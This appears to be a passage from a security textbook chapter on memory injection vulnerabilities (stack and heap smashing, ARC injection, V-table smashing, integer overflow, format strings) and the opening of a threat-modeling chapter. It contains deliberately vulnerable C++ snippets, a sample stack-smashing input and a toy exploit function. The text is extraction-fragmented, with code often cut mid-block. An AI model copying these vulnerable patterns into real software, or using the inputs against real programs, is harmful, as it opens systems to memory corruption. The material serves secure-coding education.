Vulnerability 2. Through some vulnerability, there must be a way for user input to
overwrite the function pointer. This typically happens through a stack
buffer vulnerability.
3. After the memory is overwritten, the function pointer must be
dereferenced.
{
long buffer[4];
void (* pointerFunction)() = safe;
Exploitation 2. The attacker must have the address to another function which is to be
used to replace the existing function pointer.
Thus it is necessary for the address of a function providing useful functionality to
be known by the attacker. This can be an existing function already present in the
compiled code or it could be the address to machine language code provided by
the attacker in a compromised buffer.
142 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
This will work much like pointer subterfuge except we are overwriting a function
pointer instead of a data pointer. For a reviewed how function pointers work,
please see Appendix B: Function Pointers. Back to our example code:
{
long buffer[1];
void (* pointerFunction)() = safe;
0x004016d6
buffer[0]
Figure 07.5: Memory organization before an ARC injection attack
Notice that all the functions in the program reside in the code segment and
therefore have an address. Here pointerFunction points to a safe function.
Unfortunately, the attacker happens to know the address of dangerous(). He
provides 4202714 (corresponding to the hexadecimal value 0x4020da). The result
is the following:
main : 0x40094d
safe : 0x4016d6
function1 : 0x401820
dangerous : 0x4020da
buffer pointerFunction function2 : 0x4020ff
0x004020da
buffer[0] buffer[1]
Figure 07.6: Memory organization after an ARC injection attack
Often the attacker cannot provide a valid function pointer so ARC injection is not
possible. Instead, the attacker can provide bogus data resulting in a crash when
the pointer is dereferenced. This becomes ARC spraying, a denial attack. Another
possible attack vector involves the user providing machine instructions into some
input buffer. The attacker would then put the address of these instructions in the
function pointer. When the function pointer is dereferenced, the provided
machine instructions are then executed.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 143
V-Table Smashing
V-Table smashing is a special case of ARC injection. This occurs because virtual
functions in most object oriented languages are implemented using a data
structure called a Virtual Method Table (or V-Table for short). V-Tables are
essentially structures of function pointers. Thus, if the attacker is able to modify
the V-Table of an object, then it becomes possible to substitute the valid function
pointer with another malicious function pointer (rix, 2000).
For a V-Table smashing vulnerability to exist in the code, the following must be
present:
1. The vulnerable class must be polymorphic.
2. The class must have a buffer as a member variable.
Vulnerability
3. Through some vulnerability, there must be a way for user input to
overwrite parts of the V-Table.
4. After a virtual function pointer is overwritten, the virtual function must
be called.
class Vulnerable
{
public:
Example virtual void safe(); // polymorphic function
private:
long buffer[2]; // an array in the class that has
}; // a buffer overrun vulnerability
144 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
V-Table smashing is just a special form of ARC injection. The only difference is that
the function pointer is in a V-Table rather than begin a normal stand-alone
variable. To review how V-Tables work, please see Appendix C: V-Tables. Back to
our vulnerable code:
class Vulnerable
{
public:
virtual void safe(); // polymorphic function
virtual void dangerous();
private:
long buffer[1]; // an array in the class that has
// a buffer overrun vulnerability
};
When we instantiate an object of type Vulnerable (who would ever do that? You
are just asking for trouble!), the layout in memory looks something like this:
safe : 0x40094d
dangerous : 0x4016d6
buffer __vtable
0x0040094d 0x004016d6
0x004016d6 0x004016d6
buffer[0] buffer[1]
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 145
Stack Smashing
Stack smashing is a term referring to the exploitation of a stack buffer overrun
vulnerability (One, Smashing the Stack for Fun and Profit, 1996). Many consider
this class of vulnerabilities to be the most important because it has often been
exploited by virus writers in the past. The first example of malware leveraging
stack smashing is the Morris Worm of 1988.
For a stack smashing vulnerability to exist in the code, the following must be
present:
1. There must be a buffer (such as an array) on the stack.
2. The buffer must be reachable from an external input.
Vulnerability
3. The mechanism to fill the buffer from the external input must not
correctly check for the buffer size.
4. The buffer must be overrun (extend beyond the intended limits of the
array).
{
char text[256]; // stack variable
Example cin >> text; // no validation on buffer size
}
The most common mediation for stack smashing attacks is to simply check buffer
Mitigation sizes on all buffer references. Some modern languages do this by default.
Compilers also add address randomization and canaries to complicate exploits.
146 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
To understand how stack smashing works, it is first necessary to have a detailed
understanding of how your particular compiler on your particular system treats
the stack. Please see Appendix E: The Callstack for a review of this.
Stack smashing works when the attacker is able to provide a new return pointer
in the place of the pointer provided by the compiler. Since this return pointer is
just a special form of a function pointer, stack smashing is a special case of ARC
injection. The problem is that this function pointer exists at the end of every single
function in the calls stack! Consider the following code:
void prompt()
{
char text[8]; // stack variable
cin >> text; // no validation on buffer size
}
Note that prompt() was called by a function called caller(). Just before we
execute the cin statement, the state of the stack is the following:
call stack
caller
caller 0xdf48321450012315
frame pointer
return 0xdf48321450012315 dangerous 0xdf48321ea74021da
prompt text ""
frame pointer
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 147
The input needs to be the following to set the return address to the dangerous()
function. Note how the address to dangerous() is embedded in the input buffer:
41 41 41 41 41 41 41 41 df 48 32 1e A7 40 21 da
148 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
Let’s say the stack address currently starts at location 0x7fffff2397800150 and
the return address is at location 0x7fffff2397800154.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 149
Heap Smashing
Heap smashing is the process of overwriting a buffer on the heap whose
boundaries are not appropriately checked (Kaempf). This may eventually result in
arbitrary code insertion. More commonly, the attacker would alter program flow
or its data.
For a heap smashing vulnerability to exist in the code, the following must be
present:
1. There must be two adjacent heap buffers.
2. The first buffer must be reachable through external input.
Vulnerability 3. The mechanism to fill the buffer from the external input must not
correctly check for the buffer size.
4. The second buffer must be released before the first.
5. The first buffer must be overrun (extend beyond the intended limits of
the array).
{
char * buffer1 = new char[4]; // requires two buffers on the heap
char * buffer2 = new char[4];
150 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
On the surface, this appears to be quite similar to stack smashing. However the
attack vector is quite a bit more complex: the attacker is not able to directly inject
code to be executed but rather a block of data in memory can be altered. To
understand how this works, it is necessary to have a deep understanding of how
heaps are maintained and how the memory manager works. For a review on this,
please see Appendix F: The Heap.
To demonstrate how this works, consider two buffers that are allocated next to
each other in memory:
{
char * buffer1 = new char[4]; // requires two buffers on the heap
char * buffer2 = new char[4];
assert(buffer1 < buffer2); // buffer 1 must be before buffer 2!
…
If the two blocks are in memory next to each other, then the layout of memory
would probably be something like this:
MCB
MCB
MCB
MCB
MCB
Figure 07.15: Memory organization before a memory free occurs
Every chunk of memory, both free and utilized, has an associated Memory Control
Block (MCB). This MCB is essentially a linked list with two member variables: the
current chunk size (size) and the previous chunk size (prevSize). In our above
example, we have two buffers (buffer1 and buffer2) somewhere on the heap.
Recall that buffer2 must be immediately after buffer1 for heap smashing to
work. Normally to free a chunk, I would just modify the pointers in the MCBs:
MCB
MCB
MCB
MCB
MCB
Memory management routines are specified from the context of the chunk being
freed. Therefore the pointer notation gets a bit tricky. Here the variable mcb refers
to the MCB of buffer2 (the one being deleted):
mcbNext = mcb + mcb->size; // the MCB of free
mcbNextNext = mcbNext + mcbNext->size; // the MCB after free
mcb->size += mcbNext->size;
mcbNextNext->prevSize += mcb->size;
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 151
As the attack progresses, the attacker will overrun buffer1, and, in the process,
place a new MCB in the slot in memory immediately before buffer2.
…
cin >> buffer1;
…
MCB
MCB
MCB
MCB
MCB
MCB
Figure 07.17: Memory organization after Heap Smashing has occured
With this buffer overrun, the pointers in the overwritten MCB are unreliable; the
attacker can put any data in there he or she chooses.
The next stage of the attack is to free the second buffer:
…
free [] buffer2;
…
Now when we free buffer2 the hope is that we can just grow the MCB of the
free chunk after buffer2 so it becomes one large chunk. To do this, we need to
update the MCB at the end of the free space as well as the MCB of buffer2. There
is just one problem with this: the MCB of buffer2 was compromised by the buffer
overrun of buffer1. This will cause the memory manager to combine free chunks.
The code for that is the following:
mcbNext = mcb + mcb->size; // the MCB of free
mcbNextNext = mcbNext + mcbNext->size; // the MCB after free
mcb->size += mcbNext->size;
mcbNextNext->prevSize += mcb->size;
152 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
Integer Overflow
Integer overflow (and the closely related integer underflow) occurs when data
from a larger data-type is assigned to that of a smaller data-type (in the above
example) or when the result of an expression exceeds the limitations of a variable
(char value = 100 * 4;). An attacker can exploit an integer overflow bug if
code validating a buffer check does not take overflow into account (Ahmad,
2003).
For an integer overflow vulnerability to exist in the code, the following must be
present:
1. There must be a security check represented by an expression.
Vulnerability
2. The expression must have the potential for overflow.
3. At least one of the numbers used to compute the sentinel must be
reachable through external input.
{
int buffer[256];
int * sentinel = buffer + 256; // the end of the buffer
int offset;
Example cin >> offset; // 0 <= offset <= 255
There are many ways to prevent this class of vulnerabilities (see below). Perhaps
the simplest is to be exceedingly careful when performing arithmetic with
Mitigation numbers provided by external input. Another is to explicitly detect overflow
cases. This is especially critical when casting data from one type to another. See
the below article for more details how to accomplish this.
Some languages, such as Python, move to Big Numbers (arrays of digits) and thus
are not susceptible to integer overflow bugs.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 153
To understand how integer overflow works, it is first necessary to understand
how integers are stored on digital computers. For a review of this, please see
Appendix D: Integers.
Every data type can hold a finite amount of data. For example, an unsigned
character (unsigned char letter;) can only hold values between 0 and 255.
What happens when a value greater than the maximum value (or less than the
minimum value) is assigned to a given variable? The answer is that the overflow
condition is met. When a value greater than the maximum is assigned to a
variable, the amount greater than the maximum is assigned.
{
// example of overflowing a small number
int largeNumber = 732;
unsigned char smallNumber = 732; // not 732 but 220!
assert(smallNumber == largeNumber % 256); // false!
}
int offset;
cin >> offset; // 0 <= offset <= 255
How can we protect this buffer so we can avoid an array index vulnerability?
Consider the following function:
inline bool isIndexValid(void * pBegin, void * pEnd, int offset)
{
// make sure the pointers are even set up correctly
assert(pBegin < pEnd);
Notice how this code carefully validates the address after we perform the pointer
arithmetic. This ensures that any overflow has happened before we perform the
security check.
{
int buffer[256];
int offset;
cin >> offset;
154 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
ANSI-Unicode Conversion
An interesting vulnerability exists when Unicode → ANSI transformations are
made. Many programmers who work with ASCII (or ANSI) text are used to the size
of the buffer being the same as the number of bytes:
const int n = 32;
char buff[n]; // traditional c-string
assert(sizeof(buff) == n); // this assertion is true
This is not true when working with Unicode text where each glyph is stored in the
integer type short:
const int n = 32;
short buff[n]; // Unicode string
assert(sizeof(buff) == n); // this assertion is not true!
{
short unicodeText1[256];
short unicodeText2[256];
inputUnicodeText(unicodeText1, 256);
Example
copyUnicodeText(unicodeText1 /* source buffer */,
unicodeText2 /* destination buffer */,
sizeof(unicodeText2) /* Should be 256 not 512! */);
}
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 155
To properly deal with non-character buffer sizes, it is important to make a
distinction between the size of the buffer and the number of elements in the
buffer. The size of the buffer is the number of bytes in the allocated memory. The
number of elements, on the other hand, may be less than the size if the element
size is greater than one.
{
int data[100];
cout << "Size of the buffer: " << sizeof(data) << endl; // 400 bytes
The correct way to get the size of a Unicode (or any other array for that matter)
is:
sizeof(buff) / sizeof(buff[0])
There are many incarnations of this bug. Most occur when explicate or implicate
casting occurs as data is converted between data-types. This can happen from
short Æ char, int Æ short, double Æ float, and many more. In each case,
the developer must be very careful that the buffer size and the number of
elements are fully considered.
156 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
VAR-ARG
VAR-ARG injection attacks are also known as “string format” attacks (Bartik,
Bassiri, & Lindiakos). These occur when commands or instructions are embedded
in string data-structures. A classic example of this type of function in C is the
printf function. When functioning normally, the printf function is passed as
many parameters as there are formatting tokens in the string. However, an
attacker could pass malicious input into the function and cause it to move onto
areas of the stack where it shouldn't operate. For example, the %s formatting
token is used to signal the printf function to output a string. If the attacker
simply gives the printf function the parameter of %s, but no string value, then
the printf function would begin to read from the stack until it found a null value,
or the program would read outside of its allowed memory. An attacker can use
the printf function to find out where the stack pointer is being held or to
determine the value of the stack pointer.
For a VAR-ARG vulnerability to exist in the code, the following must be present:
1. There must be a VAR-ARG style function.
Vulnerability 2. The number of arguments must be specified through one of the first
parameters in the list.
3. Through some external input, the user must be able to specify a different
number of parameters than the program is designed to accept.
{
char text[256];
Example cin >> text;
printf(text); // what if text=="%s%s"?
}
Exploitation of VAR-ARG attacks is quite unique to the specifics of how the VAR-
ARG structure is implemented. One common outcome is application-crash
Exploitation
yielding a denial attack when the user-provided formatting string contains
formatting tokens such as "%s."
Avoid using VAR-ARGs; they have been deprecated. Streams are used in C++ for
Mitigation a similar purpose. Languages such as Python and Swift use tuples for similar
purposes but are not susceptible to VAR-ARG vulnerabilities.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 157
The reason why this works is because functions like printf use the VAR-ARG
mechanism to allow for a variable number of parameters. This is accomplished at
run-time, as opposed to traditional functions which specify the number of
parameters they expect at compile-time:
#include <stdarg.h>
va_start(ap, n);
va_end(ap);
return sum;
}
This function is designed to work in the following way: the number of parameters
passed should line up with the n variable:
int value = sum(4 /* n */, 10, 20, 30, 40);
What would happen when we tell the function we are passing five parameters
but we are in fact only passing two?
int value = sum(5 /* n */, 10, 20); // where are the three other parameters?
This will require the VAR-ARG code to continue looking for parameters even when
they do not exist. In other words, it will result in a buffer overrun!
158 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
Examples
1. Q Name the vulnerability associated with the following code:
void fillText(char text[], int size)
{
for (unsigned char i = 0; i < size; i++)
cin >> text[i];
}
A Integer Overflow. Notice that i is an unsigned char with a maximum size of 255
and that size is an int with a maximum size of 2 billion. If the function
fillText() is called with the second parameter greater than 255, then the loop
will continue forever. This will amount to a denial attack. This meets all the
requirements for an Integer Overflow attack:
x There must be a security check represented by an expression. That
expression is i < size.
x The expression must have the potential for overflow. This is the case
because one is an unsigned char while the other is an int.
x At least one of the numbers used to compute the sentinel must be reachable
through external input. If the function fillText() is called where the value
of size comes from external input, then the possibility for an attack exists.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 159
3. Q Is it possible to write a C++ compiler that is immune to V-Table Smashing
vulnerabilities?
A Yes. It is only necessary to make sure one of the requirements cannot be met.
These requirements are:
x The vulnerable class must be polymorphic. Since C++ compilers must
support polymorphism, this cannot be changed.
x The class must have a buffer as a member variable. Since C++ classes must
support arrays as member variables, this cannot be changed.
x Through some vulnerability, there must be a way for user input to overwrite
parts of the V-Table. It is not possible to prevent buffer overruns in C++
without changing the language. However, it is possible to put the V-Table
pointer in a location where buffer overruns cannot overwrite them. For
example, imagine a class implementation where every object consists of two
pointers: one to the member variables and one to the V-Table. If the
compiler is careful to put these two parts in different locations in memory,
then it will be impossible for a buffer overrun in a member variable to alter
the V-Table. Notice how this can be accomplished without altering the C++
language.
x After a virtual function pointer is overwritten, the virtual function must be
called. This cannot be changed without altering the C++ language.
A We need to pass the buffer size of the destination buffer. Note that we have no
way to verify that the buffer size variable is correct!
void strncpy(char * dest, const char * src, int size)
{
while (--size > 0 && *(dest++) = *(src++))
;
}
160 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
5. Q Write a C++ program to exhibit the pointer subterfuge vulnerability. This
includes two functions:
x Vulnerability: A function that exhibits the vulnerability.
x Attacker: A function that calls the vulnerable function and exploits it. In
other words, we will not be accepting user input here. Instead we will pass
a value or a buffer to Vulnerability() which will cause the vulnerability
to be made manifest.
Notice how, if the size parameter was less than 2, the program would display
“Safe” on the screen. However, our attacker function does not do this:
void subterfugeExploit()
{
// an attacker’s array
long array[3] = {1, 1, (long)"Dangerous"};
// exploit it
subterfugeVulnerability(array, 3);
}
Notice how three items are in the array, and the third item is carefully created.
When the vulnerable function is called, the “Safe” message will be replaced
with “Dangerous”:
Message is: "Dangerous".
A No. There is a stack variable called text but it is just a pointer, not a buffer. The
buffer is located on the heap so it might be an example of Heap Smashing.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 161
7. Q Is there a stack smashing vulnerability in the following C++ code?
void function(char * text)
{
cin >> text;
}
A No. The buffer “some text” is static text and exists in the code section of
memory. This means we will probably have a compile error; the data type of
“some text” is a const char * rather than a char *. At any rate, since there is
no stack buffer, Stack Smashing cannot exist.
A Yes. Notice how initially text1 points to a heap buffer. This we know because of
the new statement. Notice how text2 is a stack buffer. When the statement
text1 = text2; gets executed, then text1 points to the same stack buffer that
text2 contains. This means that the cin >> text1; statement will overrun the
stack buffer. For stack smashing to occur, three conditions must be met:
x There must be a buffer (such as an array) on the stack. This condition is met
when text1 points to the text2 buffer.
x The first buffer must be reachable through external input. This condition is
met through the cin statement.
x The mechanism to fill the buffer from the external input must not correctly
check for the buffer size. This condition is met because cin does not check
for the buffer size when c-strings are on the right-hand-side of the extraction
operator.
Since all of the conditions are met, we have an example of stack smashing.
162 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
10. Q I would like to create a custom memory management tool for my application.
The standard memory manager can handle memory requests of any size. Mine
will be different. It will only allocate memory in 256 byte blocks. This means that
I do not have to use a linked list to keep track of free and reserved blocks: I can
just use a Boolean array. Is this memory management tool vulnerable to Heap
Smashing?
A No. heap smashing can only occur if an MCB can be overwritten. For this to
happen, the MCB must be near a buffer that is overrun. Since there is no MCB
in this memory management scheme, no Heap Smashing can occur. This brings
up the interesting question: what happens when a buffer is overrun? The
answer is that the adjacent buffer is overrun, but no memory management
pointers are altered. Another vulnerability might result, but it will not be Heap
Smashing.
11. Q A canary can be used to detect stack smashing attacks. Can a similar technique
be used to detect heap smashing attacks?
A Yes. A canary can be placed at the beginning of an MCB and, when memory is
freed, it can be checked. Since the acceptable way to deal with smashed
canaries is to end the program; this will effectively turn Heap Smashing attempts
into heap spraying attacks.
A No. The first requirement for heap smashing is: “There must be two adjacent
heap buffers”. Here we have only one buffer. Because the source text is longer
than the buffer size of the destination, we do have an example of a buffer
overrun. In this case, the buffer overrun results in the MCB being overridden.
This produces heap spraying.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 163
13. Q Is there a heap smashing vulnerability in the following C++ code?
{
char * text1 = new[10];
char * text2 = new[10];
strcpy(text2, userInput);
delete [] text2;
delete [] text1;
}
A No. The requirements for the heap smashing vulnerability are the following:
x There must be two adjacent heap buffers. This condition is met because
text1 and text2 were allocated right after each other. In most cases, they
will be next to each other in memory.
x The first buffer must be reachable through external input. This condition is
not met. It is the second buffer which is reached.
x The mechanism to fill the buffer from the external input must not correctly
check for the buffer size. We will assume that userInput meets this
constraint.
x The second buffer must be released before the first. Notice how text2 is
released first. This condition is met.
Since one condition is not met, we have an example of heap spraying rather
than heap smashing.
164 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
14. Q Is there a heap smashing vulnerability in the following C++ code?
void callee(char * parameter)
{
char * text = new[10];
cin >> parameter;
delete [] text;
}
void caller()
{
char * text = new[10];
callee(text);
delete [] text;
}
A Yes. The requirements for the heap smashing vulnerability are the following:
x There must be two adjacent heap buffers. Even though these two buffers
are allocated in separate functions, they will probably reside next to each
other because one was allocated immediately after the other.
x The first buffer must be reachable through external input. This condition is
met because the first buffer (called text in caller()) is reachable through
external input as parameter in callee().
x The mechanism to fill the buffer from the external input must not correctly
check for the buffer size. The cin mechanism for c-strings does not check
buffer size.
x The second buffer must be released before the first. The buffer allocated in
callee() is released first.
Since all the conditions are met, we have an example of Heap Smashing.
A If the user inputs the following text “%s%s%s”, then the printf() function will
expect four parameters when only one is given. This will output the stack
address to the screen.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 165
Exercises
1 For each of the following memory injection vulnerabilities, define it, describe
the vulnerability that is exploited, and list the conditions that must be present
for the vulnerability to be exploited:
x Stack Smashing
x Heap Smashing
x Array Index
x Integer Overflow
x Arc Injection
x Pointer Subterfuge
x Vtable Smashing
x ASCI-Unicode mismatch
x VAR-Args
166 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
6 Name the vulnerability associated with the following C++ code:
class Action
{
public:
char text[256];
virtual void safe();
virtual void unsafe();
};
getText(text, sizeof(text));
}
string source;
cout << "What is your name? ";
cin >> source;
MultiByteToWideChar(
CP_ACP, // code page: default
0, // flags: 0 means normal mode
source, // source c-string
-1, // count of byte of source
target, // target buffer Unicode
sizeof(target)); // size of target buffer
}
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 167
11 Name the vulnerability associated with the following C++ code:
void readData(int data[], int size)
{
char fileName[256];
cout << "Filename? ";
cin >> fileName
void dangerous()
{
cout << "Password: 'Rosebud'\n";
}
void doNothing()
{
char text[256];
void (*p)() = safe;
16 Describe in your own words how memory is allocated from the Heap, and how
memory is freed.
168 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
Problems
1 Please find and read the article “The Rising Threat of Vulnerabilities Due to
Integer Errors” by Ahmad (2003). In the article, the author made several
recommendations about how to mitigate integer errors. Summarize each of his
nine suggestions in your own words.
4 You are developing a C++ compiler for a single platform (iPhone). One of your
design goals is to make it impossible (or nearly impossible) to introduce a stack
vulnerability using this compiler. Note that stack implementation is completely
up to the compiler. How would you build this compiler?
5 Write a C++ program to display the address of an element on the stack, in the
heap, and in the code section of memory:
Stack: 0x7fff7c2d4738
Heap: 0x19ce010
Code: 0x400d9c
6 Write a C++ program to read and manipulate stack variables that are out of
scope. To do this, create a collection of local variables in one function. From that
first function, call a second passing no parameters. In the second function, read
and display the values of the local variables in the first function. This is done by
finding where on the stack resides the local variables of the first function.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 169
Chapter 08: Threat Modeling
It is impossible to thoroughly analyze and inspect every line of code in a large codebase. There is simply
too much code! This chapter will present a methodology for identifying those parts of the codebase most
likely to contain vulnerabilities.
Threat modeling is the process of systematically analyzing a given system for the
purpose of obtaining a ranked list of vulnerabilities to be addressed (Howard &
Threat modeling LeBlanc, 2003). The goal is to introduce enough tools and techniques to focus
is the process of vulnerability-seeking activities, without incurring undue overhead in the software
systematically development process. In other words, it falls somewhere between simple code
analyzing a system reviews and formal evaluation techniques.
for vulnerabilities Threat modeling is best done during the specification and early design phase of a
project. This enables the design team to build security into the design rather than
attempting to retro-fit security to an inherently insecure design. Threat modeling
is also a valuable activity during the closing stages of the design cycle. This enables
the test team, working in conjunction with the development team, to focus their
efforts on the security critical components of the design. Finally, threat modeling
is a valuable activity during security pushes (where all members of the team are
working to meet security goals) which could happen at any point in the
development cycle. The threat model process consists of six stages:
1. Assemble resources
2. Decompose the system
3. Identify threats
4. Rank the threats
5. Make a response plan
6. Mitigate the threats
170 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
2. Decompose the System
The second step of the threat model process is to create a map of the system.
This map needs to completely describe all the data that enters and leaves the
system, all the security checkpoints in the system, and how data gets transformed
from one state to another. Because system complexity can exceed what humans
can internalize, an external tool is necessary to facilitate the process. The most
common tool used for this purpose is a Data Flow Diagram.
A Data Flow Diagram (DFD) is a representation of a system highlighting the
storage, processing, and transmission (the three states of information resources
from the McCumber model) of information resources through the system. A DFD
is not a representation of how data is stored in the system (use a UML class
diagram for that), how functions call each other (use a structure chart for that),
or how the algorithms work (use a flow chart or pseudocode for that). Instead,
the DFD tracks the origin of data, how it passes through the system, how data is
transformed or verified through various processing steps, and where it is stored.
All security vulnerabilities occur at these key junctures.
plaintext
commands password set Hashed data
User UI Hashed data
yes/no bool get bool
Password class
Figure 08.1: Data flow diagram representing a simple program with one class
The above example illustrates several properties of the DFD:
Algorithm The algorithm is not represented in a DFD. In other words, the DFD does not
describe how the program works, just how data flows through the system. A flow
chart or pseudocode is used to describe algorithms.
Modules All the functions are not listed in a DFD. This is because not all functions
communicate with data from the outside world. A structure chart is used to
describe the modules and how they relate to each other in a program.
Data Details of the data representation are not described. The DFD describes the state
of data as it flows through the system (the labels near the arrows), but does not
describe the exact format of the data representation. A UML class diagram is a
useful tool for describing data representation.
Storage The location of where data is stored in the document is represented in a DFD.
Specifically, any user data or any system assets are represented in a DFD. It is not
necessary to represent other data types such as counters. In the above example,
“Hashed data” represents stored data.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 171
Transmission Show how data moves from one location to another. In each case, describe the
format of the data.
Processing Show where data is transformed and where key security checks are made. How
the data is transformed or how the checks are performed is not represented in a
DFD.
There are four components to a DFD: interactors, flow, processors, storage, and
trust boundaries.
Interactors
Interactors are agents existing outside the system. They provide input to the
system and consume output from the system. Examples of common interactors
include users, the network, other programs, sensors, and other I/O devices.
Interactors are represented as rectangles in DFDs:
Users are common interactors, serving to both consume output and generate
User input. Output is typically on the screen or through speakers; input is typically
textual from the keyboard or coordinates from the mouse.
Network interactors can consume output, generate input, or both. Typically this
Network is done through packets containing either textual data or binary data. In any case,
they appear in a DFD as an interactor.
When two programs interact through APIs, message passing, or file interfaces,
Program they serve as interactors to each other. Their interfaces can be simple or
complex. It is important to represent the interface with the flow.
Flow
Flow represents movement of data from one location to another, originating
from and terminating at an interactor, a processing node, or a data store. Flow
cannot go directly from one data store to another; there must be some processing
involved. Similarly, flow only consists of data transitions; it does not represent
program control.
password Here a textual password is being sent from one location to another. In the code,
this will be represented as a string object or a c-string.
bool When binary data is sent between locations, the data type is a bool. This can be
represented with the data type or the variable name.
ACL Often more complex data is sent between processes, such as a complete data
structure or a class. Again, either pass the data type or the variable representing
an instance of the data type.
filename Frequently files are sent to programs from interactors. It is important that the
format of the file is known and represented in these cases.
172 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
Processors
A DFD processor is a location in a program where data is transformed or where
checks are performed. Note that a processor is only included in a DFD when data
is being viewed that originated from outside the program. This includes data
stored within the program that originally came from a user. As a result, a DFD
almost never captures all the functionality of a program.
The only way a program can be exploited is if an external input causes the
program to behave differently than the way it was designed to behave. In other
words, if there is no external input, there is no opportunity for exploitation.
Therefore, processes that are not initiated by external input or handle external
data cannot be vulnerable to exploitation. They may have defects that cause
undesirable behavior, but that behavior is not caused by the malicious activity of
others. For example, a memory management process that periodically optimizes
memory usage cannot contain vulnerabilities if it runs on its own accord (as
opposed to being started due to an event triggered from external input) and if it
only operates on its own data. On the other hand, if it is run due to external input
or if the memory it optimizes came from an external source, then the potential
for vulnerabilities exists. For this reason, it is critical to identify all the processes
in the program that handle external data.
Functions converting data from one format to another are common processing
convert nodes. Note that a processor could be a group of functions or even part of a single
function.
Functions only allowing data to pass through if certain conditions are met are
verify also common processing nodes.
Often data flows are initiated by a process. For example, a function called read()
read may read an XML file from an external interactor.
Storage
Storage represents data at rest. It is important to realize that although we may
think data may be accessible only through a small number of known interfaces, it
can often be accessed through unexpected means. For example, the data in a
vault (called money!) may be only accessible through the vault door where all
security decisions are made. However, a thief may use an unexpected attack
vector by coming in through the floor!
Data is often stored as variables in memory. Here the variable name is
password
represented within the horizontal lines.
Data could be stored in a file. Enumerate all the ways the file can be accessed –
file.txt
not just through the program but also through the file system!
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 173
Trust Boundaries
Trust boundaries represent areas of differing levels of security or trust. In other
words, the area inside a bank is more controlled than those outside its walls.
Walls and video cameras introduce a more secure environment than the sidewalk
outside. Similarly, the area inside a program is more controlled than the file
system. Any time a protective measure is introduced, a trust boundary is implied.
The data inside a computer is controlled by the operating system, making the
computer the outermost trust boundary in many circumstances.
computer
The data inside a program is more trusted than data outside because the
program itself manages how the data is accessed and stored. Thus, the program
program forms a trust boundary.
Classes exhibiting the principle of encapsulation form a natural trust boundary
because access to the data is controlled by the setters and getters.
class
Often a trust boundary is included if part of the program has been controlled by
an authentication or access control mechanism. For example, a part of the user
control interface verifying passwords would introduce a trust boundary.
Final Thoughts
There are a few basic rules that a DFD needs to follow.
x Processes must have at least one data flow entering and one data flow exiting.
x All data flow must start and stop at a process.
x Data stores connect to processes with data flow.
x Data stores cannot connect together.
x Process names are verbs and nouns.
x Data flow names, external entities, and data store items are nouns.
174 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
3. Identify Threats
One can identify the threats to a system by looking at each part of a DFD and
looking for threats. It is important to note that these are not vulnerabilities; only
after further analysis can we determine if the threat could actually be made
manifest with the current design. Because these threats can take on so many
different forms, it is helpful at this point in time to think about the McCumber
Cube’s three dimensions: the protection mechanisms, the information states, and
the type of asset.
First, the protection mechanism could be technology, policy & practice, and
training. Since most of the threats a software engineer will be concerned with are
to be addressed with technology protection mechanisms, this dimension of the
McCumber Cube can be safely ignored. Note that this is not always the case;
social engineering attacks (Chapter 04: Social Engineering) often need to be
addressed with all three protection mechanisms.
Second, information assets can occur in one of three states: transmission (flow),
storage, and processing. Each of these states is represented in the DFD. A
thorough threat modeling process involves careful analysis of each part of the
DFD. When working with assets in transmission, it is useful to look at each layer
of the O.S.I. model in turn.
Finally, consider the type of asset and how it can be attacked. This approach is
simplified when working from a comprehensive list of possible threats. There are
many classifications of threats, including D.A.D. (disclosure, alteration, and
denial), S.T.R.I.D.E. (spoofing, tampering, repudiation, information disclosure,
denial, and elevation of privilege), and others. Of these, S.T.R.I.D.E. is the most
commonly used (Howard & Longstaff, 1998).
When considering a given security checkpoint, be that an authentication
algorithm, an encryption algorithm, or a function to transform data into some
format, it is useful to brainstorm about hypothetical attacks. Is there a disclosure
opportunity at this point? Is there an alteration opportunity? What about denial?
One problem with this approach is that the D.A.D. categories are so broad and
the types of attacks they describe are so varied that it is difficult to convince
yourself that all (or even many) of the possible attacks have been identified. This
observation has led to the S.T.R.I.D.E. taxonomy, a more detailed version of
D.A.D.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 175
S.T.R.I.D.E
The S.T.R.I.D.E. taxonomy was developed in 2002 by Microsoft Corp. to enable
software engineers to more accurately and systematically identify defects in code
